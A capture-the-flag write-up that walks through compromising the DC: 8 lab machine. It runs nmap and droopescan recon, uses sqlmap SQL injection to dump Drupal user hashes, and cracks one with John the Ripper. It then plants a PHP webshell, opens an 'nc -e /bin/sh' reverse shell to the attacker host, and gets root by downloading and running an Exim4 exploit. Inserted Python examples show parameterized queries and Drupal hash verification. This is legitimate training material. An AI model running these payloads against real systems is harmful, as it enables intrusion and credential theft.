I had planned to finish the DC series before the Lunar New Year holiday, but only got as far as DC: 8 and ended up carrying the debt over the holiday. I am now paying it off; apart from this box only DC: 9 remains, so with luck the whole DC series will be done this week.
Environment
VirtualBox: Kali & DC: 8
Net Config: NAT Network
Locating the target
$ nmap 10.0.2.1/24 -sP
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-17 14:21 CST
Nmap scan report for 10.0.2.1
Host is up (0.011s latency).
Nmap scan report for 10.0.2.2
Host is up (0.0014s latency).
Nmap scan report for 10.0.2.15
Host is up (0.00011s latency).
Nmap scan report for 10.0.2.19
Host is up (0.00091s latency).
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.96 seconds
$ nmap 10.0.2.19 -p- -A
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-17 14:21 CST
Nmap scan report for 10.0.2.19
Host is up (0.0010s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 35:a7:e6:c4:a8:3c:63:1d:e1:c0:ca:a3:66:bc:88:bf (RSA)
| 256 ab:ef:9f:69:ac:ea:54:c6:8c:61:55:49:0a:e7:aa:d9 (ECDSA)
|_ 256 7a:b2:c6:87:ec:93:76:d4:ea:59:4b:1b:c6:e8:73:f2 (ED25519)
80/tcp open http Apache httpd
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache
|_http-title: Welcome to DC-8 | DC-8
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.09 seconds
Walkthrough
Wappalyzer
Wappalyzer shows that DC: 8 runs a Drupal 7 CMS. The author seems to really like Drupal?
Droopescan
Here I came across a small tool that, much like wpscan, automates reconnaissance against Drupal and saves manual effort.
$ droopescan scan drupal -u 10.0.2.19
[+] Plugins found:
ctools http://10.0.2.19/sites/all/modules/ctools/
http://10.0.2.19/sites/all/modules/ctools/LICENSE.txt
http://10.0.2.19/sites/all/modules/ctools/API.txt
views http://10.0.2.19/sites/all/modules/views/
http://10.0.2.19/sites/all/modules/views/README.txt
http://10.0.2.19/sites/all/modules/views/LICENSE.txt
webform http://10.0.2.19/sites/all/modules/webform/
http://10.0.2.19/sites/all/modules/webform/README.md
http://10.0.2.19/sites/all/modules/webform/LICENSE.txt
ckeditor http://10.0.2.19/sites/all/modules/ckeditor/
http://10.0.2.19/sites/all/modules/ckeditor/CHANGELOG.txt
http://10.0.2.19/sites/all/modules/ckeditor/README.txt
http://10.0.2.19/sites/all/modules/ckeditor/LICENSE.txt
better_formats http://10.0.2.19/sites/all/modules/better_formats/
http://10.0.2.19/sites/all/modules/better_formats/README.txt
http://10.0.2.19/sites/all/modules/better_formats/LICENSE.txt
profile http://10.0.2.19/modules/profile/
php http://10.0.2.19/modules/php/
image http://10.0.2.19/modules/image/
[+] Themes found:
seven http://10.0.2.19/themes/seven/
garland http://10.0.2.19/themes/garland/
[+] Possible version(s):
7.67
[+] Possible interesting urls found:
Default changelog file - http://10.0.2.19/CHANGELOG.txt
Default admin - http://10.0.2.19/user/login
Get the Shell
Droopescan reports version 7.67, while the public exploits all target versions < 7.58, so this box is probably not meant to be solved through a known RCE the way DC: 1 was. I turned to the installed plugins instead, but found nothing useful there either.
Finally, while browsing the site, I noticed the nid=1 parameter.
Out of reflex I appended a single quote, and an error message came back. That was a bit surprising: a CMS exposing such a common SQL injection flaw.
I went straight to sqlmap and dumped the administrator credentials.
$ sqlmap -u "http://10.0.2.19/?nid=1" -D d7db -T users --dump
Database: d7db
Table: users
[3 entries]
+-----+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------+-----------------------+---------+---------------------------------------------------------+------------+---------+------------+--------+------------+---------+--------------------+-----------+------------+------------------+
| uid | data | init | mail | name | pass | login | theme | access | status | created | picture | timezone | signature | language | signature_format |
+-----+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------+-----------------------+---------+---------------------------------------------------------+------------+---------+------------+--------+------------+---------+--------------------+-----------+------------+------------------+
| 0 | NULL | <blank> | <blank> | <blank> | <blank> | 0 | <blank> | 0 | 0 | 0 | 0 | NULL | <blank> | <blank> | NULL |
| 1 | a:2:{s:7:"contact";i:0;s:7:"overlay";i:1;} | [email protected] | [email protected] | admin | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z | 1567766626 | <blank> | 1567766818 | 1 | 1567489015 | 0 | Australia/Brisbane | <blank> | <blank> | filtered_html |
| 2 | a:5:{s:16:"ckeditor_default";s:1:"t";s:20:"ckeditor_show_toggle";s:1:"t";s:14:"ckeditor_width";s:4:"100%";s:13:"ckeditor_lang";s:2:"en";s:18:"ckeditor_auto_lang";s:1:"t";} | [email protected] | [email protected] | john | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF | 1567497783 | <blank> | 1567498512 | 1 | 1567489250 | 0 | Australia/Brisbane | <blank> | <blank> | filtered_html |
+-----+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------+-----------------------+---------+---------------------------------------------------------+------------+---------+------------+--------+------------+---------+--------------------+-----------+------------+------------------+
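An added illustration, not part of the original writeup, of what the single quote revealed: the same nid lookup written two ways against a constructed in-memory SQLite table standing in for the site's node table. The concatenating version surfaces a database error on a stray quote (the symptom observed above), while the type-checked, parameterized version treats the input as data only.

```python
import sqlite3

# Constructed stand-in for the site's node table; titles are made up for the demo.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE node (nid INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO node VALUES (?, ?)",
                   [(1, "Welcome to DC-8"), (2, "Who we are")])
    return db

def lookup_concat(db, nid):
    # Vulnerable pattern: the request parameter is spliced into the SQL text, so a
    # quote changes the statement itself and the database reports a syntax error.
    sql = "SELECT title FROM node WHERE nid = '" + nid + "'"
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def lookup_param(db, nid):
    # Hardened pattern: nid is an integer key, so reject anything that is not one,
    # then bind the value as a parameter so it can never be parsed as SQL.
    try:
        nid_int = int(nid)
    except ValueError:
        return None
    row = db.execute("SELECT title FROM node WHERE nid = ?", (nid_int,)).fetchone()
    return row[0] if row else None

def probe(nid):
    """Return (concat_result, param_result); a DB error is reported as a 'DB_ERROR: ...' string."""
    db = make_db()
    try:
        concat = lookup_concat(db, nid)
    except sqlite3.Error as exc:
        concat = "DB_ERROR: " + str(exc)
    return concat, lookup_param(db, nid)

if __name__ == "__main__":
    for value in ("1", "1'", "99"):
        print(repr(value), "->", probe(value))
```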
There is a hint here: the user name john matches the password-cracking tool John the Ripper (JTR), so presumably we are meant to crack john's password.
$ echo -en "\$S\$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF" > john.hash
$ john john.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Drupal7, $S$ [SHA512 128/128 SSE2 2x])
Cost 1 (iteration count) is 32768 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
turtle (?)
1g 0:00:00:02 DONE (2021-02-17 15:24) 0.3745g/s 188.7p/s 188.7c/s 188.7C/s turtle..claire
Use the "--show" option to display all of the cracked passwords reliably
Session completed
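Added example, not from the original writeup: a pure-Python reimplementation of Drupal 7's password hashing (phpass-style salted, iterated SHA-512), which is what john's "Drupal7, $S$" and "iteration count is 32768" lines refer to. Verifying john's stored hash against the recovered password confirms the algorithm; cost_log2 is also the check a defender would run over a users-table dump to see which cost factor a site actually stores.

```python
import hashlib

# Drupal 7 hash layout: "$S$" + cost char + 8-char salt + phpass-base64(SHA-512), cut to 55 chars.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55
MIN_LOG2, MAX_LOG2 = 7, 30

def _phpass_b64(data: bytes) -> str:
    """Drupal's little-endian base64 variant (3 bytes -> 4 chars, no padding)."""
    out, i, n = [], 0, len(data)
    while True:
        value = data[i]; i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
        if i >= n:
            break
    return "".join(out)

def cost_log2(stored: str) -> int:
    """4th character is log2 of the iteration count: 'D' -> 15 -> 2**15 = 32768 rounds."""
    if len(stored) < 12 or stored[0] != "$" or stored[2] != "$":
        raise ValueError("not a Drupal 7 hash")
    return ITOA64.index(stored[3])

def drupal7_hash(password: str, setting: str) -> str:
    """Recompute the hash of `password` under the 12-char setting of an existing hash."""
    setting = setting[:12]
    log2 = cost_log2(setting)
    if not MIN_LOG2 <= log2 <= MAX_LOG2:
        raise ValueError("iteration count out of range")
    salt, pw = setting[4:12].encode(), password.encode()
    digest = hashlib.sha512(salt + pw).digest()
    for _ in range(1 << log2):              # 32768 chained rounds for cost 'D'
        digest = hashlib.sha512(digest + pw).digest()
    return (setting + _phpass_b64(digest))[:HASH_LENGTH]

def verify(password: str, stored: str) -> bool:
    return drupal7_hash(password, stored) == stored
```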
That yields the credentials john/turtle, and the login succeeds. In edit mode I found the same editor as in DC: 7, which can be switched to PHP Code mode; this matches Droopescan's finding that the PHP module is installed.
The WebShell can then be written in that field.
<?php
echo system($_POST['cmd']);
?>
Webshell obtained.
Get Reverse shell
Next comes the usual routine: start an nc listener, then send the payload to get a reverse shell back.
Listen
nc -nl -vv -p 8888
Victim
nc -e /bin/sh 10.0.2.15 8888
python -c "import pty;pty.spawn('/bin/bash')"
Get Root to Win
SUID Check
Checking SUID binaries turns up exim4.
Its location differs from the others, and a quick Google search shows it is an SMTP package that has a known exploitable vulnerability.
Exim4 is Debian's default MTA (Message Transfer Agent); it is present even in the base system, so it naturally has the best compatibility with the system. Configuring Exim on Debian is easy: the system provides a configuration script that walks you through it by asking questions.
https://lifegoo.pluskid.org/wiki/Exim4.html
www-data@dc-8:/tmp $ find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/sbin/exim4
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/ping
/bin/su
/bin/umount
/bin/mount
Get Root
Since Exim4 has a vulnerability usable for privilege escalation, I tried the exploit directly, but the downloaded file had ^M (\r) line endings. I had run into this before and solved it with cat << EOF > FileName, but this time, for reasons unknown, the shell terminated unexpectedly after EOF.
Thanks to an enthusiastic colleague for sharing their experience: set ff=unix fixes the problem, but I could not get vi to work in the reverse shell, and replacing ^M with vi's :%s/^M/\r/g also ran into trouble. The simplest approach is to prepare a version with the ^M stripped locally and serve it to the target for download.
Listen
wget https://www.exploit-db.com/download/46996
vi 46996
:set ff=unix
python -m SimpleHTTPServer
Victim
wget http://10.0.2.15:8000/46996
chmod +x 46996
bash 46996 -m netcat
whoami
Flag
cat /root/flag.txt
Brilliant - you have succeeded!!!
888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888
Hope you enjoyed DC-8. Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.
I'm also sending out an especially big thanks to:
@4nqr34z
@D4mianWayne
@0xmzfr
@theart42
This challenge was largely based on two things:
1. A Tweet that I came across from someone asking about 2FA on a Linux box, and whether it was worthwhile.
2. A suggestion from @theart42
The answer to that question is...
If you enjoyed this CTF, send me a tweet via @DCAU7.